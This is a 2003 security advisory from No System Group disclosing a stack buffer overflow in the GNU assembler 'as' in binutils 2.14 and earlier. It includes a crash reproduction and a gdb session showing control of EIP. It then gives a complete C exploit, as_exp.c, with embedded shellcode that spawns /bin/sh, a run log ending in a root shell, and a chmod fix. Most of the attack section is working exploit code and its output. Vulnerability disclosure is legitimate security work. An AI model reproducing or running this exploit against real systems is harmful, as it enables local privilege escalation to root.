------------------------------------------------- No System Group - Advisory #01 - 19/08/03 ------------------------------------------------- Program: as - The GNU assembler Homepage: http://sources.redhat.com/binutils/ Vulnerable Versions: GNU binutils 2.14 and prior Risk: Low / Medium Impact: Stack Buffer Overflow ------------------------------------------------- - DESCRIPTION ------------------------------------------------- The GNU Binutils are a collection of binary tools. 'as' is the GNU assembler. More informations at: http://sources.redhat.com/binutils/ - DETAILS ------------------------------------------------- $ /usr/bin/as `perl -e 'print "A" x 2005'` Segmentation fault Now we proceed to open gdb to view what may have occured. $gdb /usr/bin/as GNU gdb 5.3 Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-slackware-linux"... (no debugging symbols found)... (gdb) r `perl -e 'print "A" x 2005'` Starting program: /usr/bin/as `perl -e 'print "A" x 2005'` Assembler messages: Error: can't open AAAAAAAAAAAAAAA..........AAAAA... ..........AAAAAAA for reading (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) i r ebp eip esp ebp 0x41414141 0x41414141 eip 0x41414141 0x41414141 esp 0xbffff090 0xbffff090 (gdb) Here as you can see we are able to gain the return address. Return : 0xbffff090. - EXPLOIT ------------------------------------------------- I have done minimal testing on this. It has been tested on Slackware 9.0 and Red Hat 7.2 ------------------- as_exp.c -------------------- /* Linux 'as' buffer overflow This will give you a root shell if /usr/bin/as is SUID, which isn't by default. Use: ./as_exp [offset] Try offsets 300-400 Tested on Slackware 9.0 and Red Hat 7.2 by CoKi No System Group - http://www.nosystem.com.ar */ #include #define OFFSET 350 long esp(void); int main(int argc, char *argv[]) { char buf[2005]; char shellcode[]= "\xb0\x31\xcd\x80\x89\xc3\x31\xc0\xb0\x17\xcd\x80" "\x31\xdb\x31\xc0\xb0\x17\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07" "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb" "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; int i, off; long ret; if(argc>1) { off = atoi(argv[1]); } else off = OFFSET; ret = (esp() - off); printf("\n'as' buffer overflow by CoKi\n"); printf("----------------------------\n\n"); printf("Return Address: 0x%lx\nOffset: %d\n\n", ret, off); for(i=0;i<2005;i+=4) *(unsigned long *)&buf[i]=0x90909090; *(unsigned long *)&buf[2005 - 4]=ret; *(unsigned long *)&buf[2005 - 8]=ret; memcpy(buf + 2005 - strlen(shellcode) - 8, shellcode, strlen(shellcode)); execlp("/usr/bin/as","as",buf,0); } long esp(void){ __asm__("movl %esp,%eax"); } ------------------- as_exp.c -------------------- $ gcc -o as_exp as_exp.c $ ./as_exp 390 'as' buffer overflow by CoKi ---------------------------- Return Address: 0xbffff002 Offset: 390 Assembler messages: Error: can't open ............ .................../bin/sh ..... for reading sh-2.05b# id uid=0(root) gid=100(users) groups=100(users) sh-2.05b# This will give you a root shell if /usr/bin/as is SUID, which isn't by default. - SOLUTIONS ------------------------------------------------- Remove suid permissions on the program if it has them #chmod u-s /usr/bin/as - REFERENCES ------------------------------------------------- http://www.nosystem.com.ar/advisories/advisory-01.txt - CREDITS ------------------------------------------------- Discovered by CoKi No System Group - http://www.nosystem.com.ar